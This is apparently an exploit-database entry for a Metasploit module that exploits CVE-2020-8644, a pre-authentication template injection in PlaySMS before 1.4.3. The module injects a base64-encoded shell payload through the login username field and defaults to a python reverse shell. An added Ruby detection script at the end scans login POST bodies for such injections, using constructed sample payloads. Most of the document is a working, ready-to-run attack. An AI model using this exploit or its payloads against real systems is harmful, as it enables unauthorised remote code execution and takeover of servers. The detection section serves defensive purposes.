PlaySMS 1.4.3 - Template Injection / Remote Code Execution

Author: Touhid M.Shaikh
Platform: php
Release date: 2020-03-11

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'PlaySMS 1.4.3 Pre Auth Template Injection Remote Code Execution',
      'Description' => %q{
        This module exploits a pre-auth server-side template injection that
        leads to remote code execution in PlaySMS before version 1.4.3.
        The issue is caused by double processing of a server-side template by
        the custom PHP template system 'TPL', which the PlaySMS template
        engine uses in src/Playsms/Tpl.php:_compile(). When an attacker
        submits a username containing a malicious payload, the payload is
        first processed by TPL and its value is saved into the current
        template; on the second processing pass the injected code is
        executed. The TPL (https://github.com/antonraharja/tpl) template
        language is vulnerable to PHP code injection.

        This module was tested against PlaySMS 1.4 on HackTheBox's Frolic
        machine.
      },
      'Author' =>
        [
          'Touhid M.Shaikh <touhidshaikh22[at]gmail.com>', # Metasploit module
          'Lucas Rosevear' # Discovery and initial PoC by NCC Group
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['CVE', '2020-8644'],
          ['URL', 'https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/']
        ],
      'DefaultOptions' =>
        {
          'SSL'     => false,
          'PAYLOAD' => 'cmd/unix/reverse_python'
        },
      'Privileged' => false,
      'Platform'   => %w[unix linux],
      'Arch'       => ARCH_CMD,
      'Payload'    =>
        {
          'Compat' =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'python'
            }
        },
      'Targets' =>
        [
          [ 'PlaySMS Before 1.4.3', { } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Feb 05 2020'))

    register_options(
      [
        OptString.new('TARGETURI', [ true, 'Base playsms directory path', '/']),
      ])
  end

  def uri
    return target_uri.path
  end

  def check
    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(uri, 'index.php')
      })
    rescue
      vprint_error('Unable to access the index.php file')
      return CheckCode::Unknown
    end

    # send_request_cgi returns nil on a connection timeout rather than raising.
    return CheckCode::Unknown if res.nil?

    # An unauthenticated PlaySMS install redirects index.php to its login route.
    if res.code == 302 &&
       res.headers['Location'].to_s.include?('index.php?app=main&inc=core_auth&route=login')
      return CheckCode::Appears
    end

    return CheckCode::Safe
  end

  # Send the payload in the login request
  def login
    res = send_request_cgi({
      'uri' => normalize_uri(uri, 'index.php'),
      'method' => 'GET',
      'vars_get' => {
        'app' => 'main',
        'inc' => 'core_auth',
        'route' => 'login',
      }
    })

    fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to login page request") if res.nil?

    # Grab the CSRF token from the login form body
    /name="X-CSRF-Token" value="(?<csrf>[a-z0-9]+)">/ =~ res.body
    fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil?
    vprint_good("X-CSRF-Token for login : #{csrf}")

    cookies = res.get_cookies

    vprint_status('Trying to send payload in username field ......')

    # Encoded in base64 to avoid the HTML tags that the application filters.
    evil = "{{`printf #{Rex::Text.encode_base64(payload.encode)}|base64 -d |sh`}}"

    # Send the payload with the session cookies.
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(uri, 'index.php'),
      'cookie' => cookies,
      'vars_get' => Hash[{
        'app' => 'main',
        'inc' => 'core_auth',
        'route' => 'login',
        'op' => 'login',
      }.to_a.shuffle],
      'vars_post' => Hash[{
        'X-CSRF-Token' => csrf,
        'username' => evil,
        'password' => ''
      }.to_a.shuffle],
    })

    fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to login request") if res.nil?

    # Request status check
    if res.code == 302
      print_good('Payload successfully sent')
      return cookies
    else
      fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response code #{res.code}")
    end
  end

  def exploit
    cookies = login
    vprint_status("Cookies here : #{cookies}")
    # Reloading the login page renders the stored username a second time,
    # which executes the injected template code.
    send_request_cgi({
      'uri' => normalize_uri(uri, 'index.php'),
      'method' => 'GET',
      'cookie' => cookies,
      'vars_get' => {
        'app' => 'main',
        'inc' => 'core_auth',
        'route' => 'login',
      }
    })
  end
end
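The module above injects its payload through the login form's username field, wrapped in TPL's {{ }} delimiters with backticks inside. The Ruby below is an added detection example (not part of the module or of PlaySMS) that a defender could run over captured login POST bodies, such as those a WAF or ModSecurity audit log records; the sample bodies are constructed, and the field names follow the module's request.

```ruby
require 'cgi'

# Constructed sample: urlencoded POST bodies of PlaySMS login requests
# (index.php?app=main&inc=core_auth&route=login&op=login) as an audit log
# would record them. Not real traffic.
SAMPLE_BODIES = [
  'X-CSRF-Token=6f3a1b&username=alice&password=secret',           # benign
  'X-CSRF-Token=6f3a1b&username=%7B%7B%60id%60%7D%7D&password=',  # {{`id`}}
  'X-CSRF-Token=6f3a1b&username=bob%7B%7B&password=x',            # unbalanced {{, benign
  # {{`printf aGk=|base64 -d|sh`}} : the encode-then-decode shape the module uses
  'X-CSRF-Token=6f3a1b&username=%7B%7B%60printf+aGk%3D%7Cbase64+-d%7Csh%60%7D%7D&password=',
].freeze

# A complete TPL tag: opening {{ ... closing }}, possibly spanning newlines.
TPL_TAG = /\{\{(.*?)\}\}/m
# Inside a tag, these markers indicate code execution rather than a variable reference.
CODE_MARKERS = /`|<\?|\bbase64\s+-d\b|\|\s*sh\b|\bsystem\s*\(|\bexec\s*\(/

# Decode the urlencoded body and return the submitted username (nil if absent).
def login_username(body)
  CGI.parse(body).fetch('username', []).first
end

# :clean, :template_tag (a balanced {{ }} in a username, worth a look) or
# :code_injection (the tag carries shell/PHP execution markers).
def classify_username(username)
  return :clean if username.nil?
  tag = TPL_TAG.match(username)
  return :clean if tag.nil?
  tag[1] =~ CODE_MARKERS ? :code_injection : :template_tag
end

# Classify every body; returns [[username, verdict], ...] in input order.
def scan_bodies(bodies)
  bodies.map do |body|
    user = login_username(body)
    [user, classify_username(user)]
  end
end

if __FILE__ == $PROGRAM_NAME
  scan_bodies(SAMPLE_BODIES).each { |user, verdict| puts format('%-16s %s', verdict, user.inspect) }
end
```

Usernames matching :template_tag or :code_injection should never reach a template compile step; on a patched PlaySMS they are still worth alerting on, because they show someone probing for CVE-2020-8644.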
